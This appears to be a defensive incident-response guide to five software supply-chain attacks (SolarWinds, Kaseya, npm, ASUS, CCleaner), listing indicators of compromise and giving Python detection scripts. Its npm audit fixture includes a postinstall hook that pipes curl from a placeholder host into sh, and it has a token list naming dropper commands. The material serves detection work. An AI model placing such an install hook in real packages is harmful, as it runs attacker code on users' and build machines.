1. SolarWinds (2020)
What Happened
Attackers compromised SolarWinds’ build environment and injected malicious code (SUNBURST) into Orion software updates, which were digitally signed and distributed to ~18,000 customers, including government agencies.
Host-Based IOCs
- SolarWinds.Orion.Core.BusinessLayer.dll modified but still carrying a valid SolarWinds digital signature
- DLL hash mismatch across environments (same product version, different file hash)
- Existing scheduled tasks temporarily modified to launch attacker tooling and then restored to their original configuration
Network IOCs
- DNS queries to subdomains of avsvmcloud[.]com
- Delayed beaconing: the implant stays dormant for up to about two weeks (12–14 days) after install before its first DNS query
- HTTPS traffic mimicking legitimate Orion behavior
Behavioral IOCs
- Orion host process (SolarWinds.BusinessLayerHost.exe) performing credential access or dumping
- Lateral movement into identity providers and cloud tenants via forged SAML tokens (Golden SAML)
- Privileged accounts, credentials or service-principal permissions added with no matching admin change record
IR Challenges
- Malware was signed and trusted
- Extremely long dwell time (~9 months)
- Required coordination with vendor, government, and customers
Lessons Learned
- A valid code signature proves who signed the build, not that the build is clean
- Behavioral detection > signature detection
- Need for SBOMs and build-pipeline security
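The network IOCs above reduce to two checks a defender can run over resolver logs: does any host query a name under avsvmcloud[.]com, and how long after the Orion update landed did the first such query appear. The script below is an added example written for this page, not SolarWinds' or FireEye's code; the log lines, the host names, the install times and the subdomain label are all constructed, and the log format ("timestamp host qname") is an assumption about the resolver.

```python
import re
from datetime import datetime

# Constructed DNS resolver log lines for illustration (not real telemetry).
# Assumed format: "<ISO-8601 UTC timestamp> <client host> <query name>"
DNS_LOG = """\
2020-03-26T10:02:11Z orion-01 www.solarwinds.com
2020-03-27T08:15:00Z orion-02 updates.solarwinds.com
2020-04-09T14:31:05Z orion-01 k9q2zs7.appsync-api.eu-west-1.avsvmcloud.com
2020-04-09T14:31:06Z orion-01 k9q2zs7.appsync-api.eu-west-1.avsvmcloud.com
2020-04-10T09:00:00Z web-03 avsvmcloud.com.cdn.example.net
2020-04-10T09:00:01Z web-03 notavsvmcloud.com
"""

# Constructed install times of the tampered Orion update per host (assumed to come
# from patch inventory; hosts and times are invented for the example).
INSTALL_TIME = {
    "orion-01": datetime(2020, 3, 26, 9, 55, 0),
    "orion-02": datetime(2020, 3, 27, 8, 0, 0),
}

WATCHED_DOMAIN = "avsvmcloud.com"
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


def is_watched(qname: str, domain: str = WATCHED_DOMAIN) -> bool:
    """True only for the domain itself or a label *under* it.

    Matching the suffix with a leading dot avoids two classic false positives:
    look-alikes such as notavsvmcloud.com, and the watched name appearing as a
    prefix of some other domain (avsvmcloud.com.cdn.example.net).
    """
    q = qname.lower().rstrip(".")
    return q == domain or q.endswith("." + domain)


def parse_dns_log(text: str):
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines instead of aborting the sweep
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        records.append((ts, m.group(2), m.group(3)))
    return records


def find_beacons(records, install_times):
    """Per host: first/last sighting, query count and dormancy since install."""
    hits = {}
    for ts, host, qname in sorted(records):
        if not is_watched(qname):
            continue
        entry = hits.setdefault(
            host, {"first_seen": ts, "last_seen": ts, "count": 0, "names": set()}
        )
        entry["last_seen"] = ts
        entry["count"] += 1
        entry["names"].add(qname)
    for host, entry in hits.items():
        installed = install_times.get(host)
        # Whole days between the update landing and the first beacon. SUNBURST's
        # built-in wait puts this near two weeks rather than seconds, which is why
        # "first outbound after install" alerting tuned to minutes never fired.
        entry["dormancy_days"] = (
            (entry["first_seen"] - installed).days if installed else None
        )
    return hits


if __name__ == "__main__":
    for host, e in find_beacons(parse_dns_log(DNS_LOG), INSTALL_TIME).items():
        print(f"{host}: {e['count']} queries, first {e['first_seen']:%Y-%m-%d}, "
              f"dormant {e['dormancy_days']} days, names={sorted(e['names'])}")
```

Run it over a week of resolver logs rather than a day: the dormancy window means the interesting query sits far from the install event, and the two negative cases in the sample show why a plain substring match on the domain is not good enough.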
2. Kaseya VSA Attack (2021)
What Happened
Attackers (the REvil ransomware operation) exploited zero-day vulnerabilities in on-premises Kaseya VSA servers, a remote monitoring and management tool used by MSPs. The compromised servers pushed a fake "hot-fix" procedure through the VSA agent that deployed ransomware to thousands of downstream organizations.
Host-Based IOCs
- Suspicious PowerShell spawned by Agent.exe
- Files renamed with ransomware extensions
- Dropped executable masquerading as a VSA update
Network IOCs
- Connections to attacker-controlled IPs immediately after update
- SMB traffic spikes from MSP-managed endpoints
Behavioral IOCs
- Mass encryption events within minutes
- Simultaneous execution across multiple tenants
- VSA agent running commands outside normal maintenance windows
IR Challenges
- One MSP compromise = hundreds of victims
- Required immediate shutdown of VSA servers globally
Lessons Learned
- MSPs are high-value targets
- Patch management tools can become weapons
- Segmentation between management tools and production systems is critical
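The behavioral IOCs in this section are rate and coincidence signals rather than file hashes: many renames to one new extension on a host within a minute, and the same burst starting on hosts in several unrelated tenants within a few minutes of each other, which is what a single management server pushing a payload looks like from the endpoint side. The detector below is an added example for this page, not Kaseya's or any EDR vendor's code; the event lines, tenant and host names and extensions are constructed, and the "timestamp tenant host old -> new" event format is an assumption.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed EDR file-rename events (not real telemetry). Assumed format:
# "<ISO-8601 UTC timestamp> <tenant> <host> <old name> -> <new name>"
FILE_EVENTS = """\
2021-07-02T18:30:00Z tenantA ws-11 report.docx -> report.docx.k7s2x
2021-07-02T18:30:05Z tenantA ws-11 budget.xlsx -> budget.xlsx.k7s2x
2021-07-02T18:30:09Z tenantA ws-11 notes.txt -> notes.txt.k7s2x
2021-07-02T18:30:14Z tenantA ws-11 deck.pptx -> deck.pptx.k7s2x
2021-07-02T18:30:20Z tenantA ws-11 plan.pdf -> plan.pdf.k7s2x
2021-07-02T18:30:26Z tenantA ws-11 logo.png -> logo.png.k7s2x
2021-07-02T18:33:41Z tenantB srv-02 invoice1.pdf -> invoice1.pdf.q9m4z
2021-07-02T18:33:42Z tenantB srv-02 invoice2.pdf -> invoice2.pdf.q9m4z
2021-07-02T18:33:44Z tenantB srv-02 invoice3.pdf -> invoice3.pdf.q9m4z
2021-07-02T18:33:47Z tenantB srv-02 db.bak -> db.bak.q9m4z
2021-07-02T18:33:50Z tenantB srv-02 readme.md -> readme.md.q9m4z
2021-07-02T18:34:02Z tenantB srv-02 cfg.ini -> cfg.ini.q9m4z
2021-07-02T18:40:00Z tenantC dev-07 draft_v1.md -> draft_v2.md
2021-07-02T19:10:00Z tenantC dev-07 old.log -> old.log.bak
"""

WINDOW = timedelta(seconds=60)    # per-host burst window (tune to your telemetry rate)
THRESHOLD = 5                     # renames inside WINDOW before we call it a burst
SPREAD = timedelta(minutes=10)    # bursts this close across tenants count as coordinated


def parse_events(text):
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6 or parts[4] != "->":
            continue  # ignore malformed lines
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
        events.append({"ts": ts, "tenant": parts[1], "host": parts[2], "new": parts[5]})
    return events


def burst_hosts(events, window=WINDOW, threshold=THRESHOLD):
    """Sliding window per host: flag hosts with >= threshold renames in any window.

    Returns {host: {"tenant", "start", "peak", "extensions"}}. A single new
    extension across the whole burst is the encryptor's signature; normal user
    activity renames to many different extensions.
    """
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    flagged = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        j = 0  # exclusive end of the window; only moves forward
        for i in range(len(evs)):
            while j < len(evs) and evs[j]["ts"] - evs[i]["ts"] <= window:
                j += 1
            count = j - i
            if count >= threshold:
                entry = flagged.setdefault(host, {
                    "tenant": evs[i]["tenant"], "start": evs[i]["ts"],
                    "peak": 0, "extensions": set(),
                })
                entry["peak"] = max(entry["peak"], count)
                entry["extensions"].update(e["new"].rsplit(".", 1)[-1] for e in evs[i:j])
    return flagged


def coordinated_bursts(flagged, spread=SPREAD):
    """Group bursts whose start times fall within `spread` of the group's first burst
    and report the groups spanning more than one tenant."""
    items = sorted(flagged.items(), key=lambda kv: kv[1]["start"])
    groups, current = [], []
    for host, info in items:
        if current and info["start"] - current[0][1]["start"] > spread:
            groups.append(current)
            current = []
        current.append((host, info))
    if current:
        groups.append(current)
    return [
        {
            "start": g[0][1]["start"],
            "tenants": sorted({i["tenant"] for _, i in g}),
            "hosts": sorted(h for h, _ in g),
        }
        for g in groups
        if len({i["tenant"] for _, i in g}) > 1
    ]


if __name__ == "__main__":
    flagged = burst_hosts(parse_events(FILE_EVENTS))
    for host, info in flagged.items():
        print(f"{host} ({info['tenant']}): burst from {info['start']:%H:%M:%S}, "
              f"peak {info['peak']} renames/min, ext={sorted(info['extensions'])}")
    for g in coordinated_bursts(flagged):
        print(f"coordinated: tenants={g['tenants']} hosts={g['hosts']} at {g['start']:%H:%M:%S}")
```

The cross-tenant stage only makes sense where one party (the MSP) can see events from several customers; the per-host stage is the piece each customer can run alone. dev-07 in the sample shows the boring case: two renames an hour apart, to different extensions, never reach the threshold.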
3. NPM Package Compromises
What Happened
Attackers uploaded malicious JavaScript packages or hijacked maintainer accounts. These packages were automatically pulled into applications during builds.
Host-Based IOCs
- Obfuscated JavaScript in dependencies
- Post-install scripts spawning shell commands
- Unexpected files created during build time
Network IOCs
- Outbound HTTP requests during npm install
- Credential exfiltration to paste sites or cloud storage
- DNS queries from CI/CD servers (abnormal)
Behavioral IOCs
- Builds failing only after dependency updates
- Environment variables accessed by non-build tools
- CI tokens accessed by user-land scripts
IR Challenges
- Open-source trust model
- Deep dependency chains
- Difficult to identify which builds are affected
Lessons Learned
- Dependency pinning (lockfiles with integrity hashes, installed with npm ci) is essential
- Continuous dependency scanning required
- SBOM visibility is critical
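Three of the IOCs and lessons above can be checked before a build ever runs: a dependency whose version range lets the resolver pick a newer (possibly hijacked) release, a dependency whose install-time lifecycle hook shells out or fetches from the network, and a lockfile entry that resolves outside the expected registry or carries no integrity hash. The audit below is an added example written for this page, not npm's tooling; the application manifest, the dependency manifest and the lockfile are constructed, and the names helper-lib, color-util, good-lib and example.invalid are invented.

```python
import json
import re
from urllib.parse import urlparse

# Constructed application manifest (not a real package).
APP_PACKAGE_JSON = json.loads("""
{
  "name": "example-app",
  "dependencies": {
    "good-lib": "2.4.1",
    "helper-lib": "^1.3.0",
    "color-util": "*"
  }
}
""")

# Constructed manifest of a dependency as it would sit in node_modules/helper-lib.
# The postinstall hook is the dropper pattern: it runs automatically on install.
HELPER_LIB_MANIFEST = json.loads(r"""
{
  "name": "helper-lib",
  "version": "1.3.2",
  "scripts": {
    "postinstall": "node -e \"require('child_process').execSync('curl -s https://example.invalid/i | sh')\"",
    "test": "jest"
  }
}
""")

# Constructed package-lock.json (lockfileVersion 3 layout).
APP_LOCK = json.loads("""
{
  "name": "example-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "example-app"},
    "node_modules/good-lib": {
      "version": "2.4.1",
      "resolved": "https://registry.npmjs.org/good-lib/-/good-lib-2.4.1.tgz",
      "integrity": "sha512-AAAA"
    },
    "node_modules/helper-lib": {
      "version": "1.3.2",
      "resolved": "https://cdn.example.invalid/helper-lib-1.3.2.tgz",
      "integrity": "sha512-BBBB"
    },
    "node_modules/color-util": {
      "version": "0.9.0",
      "resolved": "https://registry.npmjs.org/color-util/-/color-util-0.9.0.tgz"
    }
  }
}
""")

# Exact semver only: no ^, ~, *, x, ranges or tags.
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Tokens that rarely belong in a library's install hook but are typical of droppers.
SUSPICIOUS = ("curl ", "wget ", "child_process", "| sh", "| bash", "powershell", "base64", "eval(")


def find_unpinned(pkg):
    """Dependencies whose range lets the resolver pick a newer, possibly hijacked, release."""
    out = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in pkg.get(section, {}).items():
            if not EXACT_VERSION.match(spec):
                out.append((name, spec))
    return out


def risky_install_scripts(manifest):
    """Lifecycle hooks that run automatically on install and look like droppers."""
    scripts = manifest.get("scripts", {})
    return {
        hook: cmd for hook, cmd in scripts.items()
        if hook in LIFECYCLE_HOOKS and any(tok in cmd for tok in SUSPICIOUS)
    }


def audit_lock(lock, allowed_host="registry.npmjs.org"):
    """Entries that resolve outside the expected registry or lack an integrity hash."""
    findings = []
    for path, entry in lock.get("packages", {}).items():
        if path == "":
            continue  # the root project entry has no tarball
        host = urlparse(entry.get("resolved", "")).hostname
        if host != allowed_host:
            findings.append((path, "off-registry:" + str(host)))
        if not entry.get("integrity"):
            findings.append((path, "no-integrity"))
    return findings


if __name__ == "__main__":
    print("unpinned:", find_unpinned(APP_PACKAGE_JSON))
    print("risky hooks:", risky_install_scripts(HELPER_LIB_MANIFEST))
    print("lockfile:", audit_lock(APP_LOCK))
```

In CI, pair the audit with `npm ci` (installs exactly what the lockfile says and fails if package.json and the lockfile disagree) and `--ignore-scripts` (suppresses the lifecycle hooks), then run any genuinely required build scripts explicitly; that removes the automatic execution path the post-install IOC depends on.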
4. ASUS Live Update Attack (2019)
What Happened
Attackers trojanized the ASUS Live Update utility and distributed it through ASUS's own update channel, signed with a valid ASUS certificate (Operation ShadowHammer). The backdoor was highly selective: it activated only on machines whose MAC addresses matched a hardcoded list of roughly 600 targets, although the trojanized updater was installed on a far larger population of machines.
Host-Based IOCs
- Signed ASUS Live Update binaries carrying a hidden payload
- Payload runs only if a hash of the machine's MAC address matches the hardcoded target list
- Second-stage download triggered only on matched machines; on every other machine the trojanized updater behaves like the legitimate one
Network IOCs
- Outbound traffic from the Live Update process to a non-ASUS domain (asushotfix[.]com) on targeted systems only
- No malicious traffic at all on non-targeted systems, so network telemetry alone misses most infected hosts
Behavioral IOCs
- Execution conditional on hardware identifiers
- No visible user impact unless targeted
- The trojanized updater sits on every affected machine as a trusted, signed vendor component whether or not the target check ever fires
IR Challenges
- Hardware-level trust abuse
- Extremely stealthy targeting
- Many victims never knew they were targets
Lessons Learned
- Vendor updates must be verified independently of the vendor's signature (out-of-band hash comparison, monitoring of the update servers themselves)
- Selective attacks can evade mass detection
- Trust chains must be continuously audited
5. CCleaner (2017)
What Happened
Attackers compromised the build environment of CCleaner (Piriform, acquired by Avast shortly before) and distributed a trojanized but validly signed 32-bit build of version 5.33 to about 2.27 million users. The backdoor then delivered a second-stage payload only to a small set of machines at targeted technology companies.
Host-Based IOCs
- Signed CCleaner installer and binary containing a backdoor
- Second-stage payload dropped selectively on machines whose domain matched a target list
- Registry values written under HKLM\SOFTWARE\Piriform\Agomo to store the implant's state
Network IOCs
- HTTPS beaconing to a hardcoded attacker IP, with a DGA fallback if that fails
- C2 traffic originating from the legitimate, signed CCleaner process
Behavioral IOCs
- Normal system utility performing reconnaissance
- Targeted delivery of secondary malware
- Antivirus initially trusts execution
IR Challenges
- Massive user base
- Malware trusted by antivirus initially
- Difficult to separate clean vs infected installs
Lessons Learned
- Build environment security is critical
- Monitoring signed software behavior is mandatory
- Post-incident revocation is complex
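The SolarWinds host IOC ("DLL hash mismatch across environments"), the ASUS lesson that signatures must be verified independently, and the CCleaner challenge of separating clean from infected installs all come down to the same inventory question: for a given product version, does every host carry the same file hash, and does that hash match what the vendor published? The script below is an added example written for this page, not any vendor's tooling; the inventory records, hashes, known-good and known-bad lists are constructed (the hashes are placeholders, not real IOCs), and the record layout (host, file, version, sha256, signer) is an assumption about what an inventory export provides.

```python
from collections import defaultdict

# Constructed software-inventory records (invented hosts and placeholder hashes).
# Assumed fields: host, product file, version, SHA-256 of the file, signer CN.
INVENTORY = [
    ("orion-01", "SolarWinds.Orion.Core.BusinessLayer.dll", "2020.2.1", "sha256:1111aaaa", "SolarWinds"),
    ("orion-02", "SolarWinds.Orion.Core.BusinessLayer.dll", "2020.2.1", "sha256:2222bbbb", "SolarWinds"),
    ("orion-03", "SolarWinds.Orion.Core.BusinessLayer.dll", "2020.2.1", "sha256:1111aaaa", "SolarWinds"),
    ("ws-10", "CCleaner.exe", "5.33.6162", "sha256:3333cccc", "Piriform"),
    ("ws-11", "CCleaner.exe", "5.33.6162", "sha256:3333cccc", "Piriform"),
    ("ws-12", "CCleaner.exe", "5.34.6207", "sha256:4444dddd", "Piriform"),
]

# Constructed stand-ins for vendor-published hashes and for an advisory's known-bad list.
KNOWN_GOOD = {
    ("SolarWinds.Orion.Core.BusinessLayer.dll", "2020.2.1"): {"sha256:1111aaaa"},
    ("CCleaner.exe", "5.34.6207"): {"sha256:4444dddd"},
}
KNOWN_BAD = {"sha256:3333cccc"}


def divergent_builds(records):
    """(product, version) pairs installed under more than one distinct hash.

    Both copies carry the same signer, so a signature check passes on each;
    the build itself is what differs.
    """
    hashes = defaultdict(lambda: defaultdict(list))
    for host, product, version, digest, _signer in records:
        hashes[(product, version)][digest].append(host)
    return {key: dict(v) for key, v in hashes.items() if len(v) > 1}


def minority_hosts(records):
    """Hosts carrying the less common hash of a divergent build.

    A triage starting point, not proof: an attacker who poisons the build
    early enough owns the majority, which is exactly the CCleaner situation.
    """
    out = []
    for (product, version), by_hash in divergent_builds(records).items():
        majority = max(by_hash, key=lambda h: len(by_hash[h]))
        for digest, hosts in by_hash.items():
            if digest != majority:
                out.extend((h, product, version, digest) for h in hosts)
    return sorted(out)


def hosts_not_on_known_good(records, known_good):
    """Compare against vendor-published hashes instead of the fleet majority.
    Versions with no published hash are left alone rather than guessed at."""
    return sorted(
        (host, product, version, digest)
        for host, product, version, digest, _ in records
        if (product, version) in known_good and digest not in known_good[(product, version)]
    )


def hosts_with_known_bad(records, known_bad):
    """Direct match on an advisory's bad hashes: the only check that catches a
    build where every install in the fleet is the trojanized one."""
    return sorted(
        (host, product, version, digest)
        for host, product, version, digest, _ in records
        if digest in known_bad
    )


def signers_for(records, product, version):
    return {s for _, p, v, _, s in records if (p, v) == (product, version)}


if __name__ == "__main__":
    print("divergent builds:", divergent_builds(INVENTORY))
    print("minority hosts:", minority_hosts(INVENTORY))
    print("not on known-good:", hosts_not_on_known_good(INVENTORY, KNOWN_GOOD))
    print("known-bad:", hosts_with_known_bad(INVENTORY, KNOWN_BAD))
```

The three checks answer different questions and each one misses a case the others catch: fleet comparison finds orion-02 with no vendor help but is blind to the CCleaner 5.33 hosts, where every copy is the same trojanized build; the known-good list needs the vendor to publish hashes; the known-bad list only exists after disclosure. Running all three against the same inventory export is the practical version of "code signing ≠ safe".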
| Case | Host IOCs | Network IOCs | Behavioral IOCs |
|---|---|---|---|
| SolarWinds | Signed DLL tampering | avsvmcloud[.]com DNS | Token forgery, stealth beaconing |
| Kaseya | Ransomware via VSA agent | MSP-wide outbound traffic | Simultaneous mass execution |
| NPM | Malicious post-install scripts | CI/CD outbound connections | Credential access during builds |
| ASUS | Trojanized, signed Live Update utility | Outbound traffic from targeted hosts only | MAC-address-gated execution |
| CCleaner | Trojanized installer | Embedded C2 in utility | Selective second-stage payload |
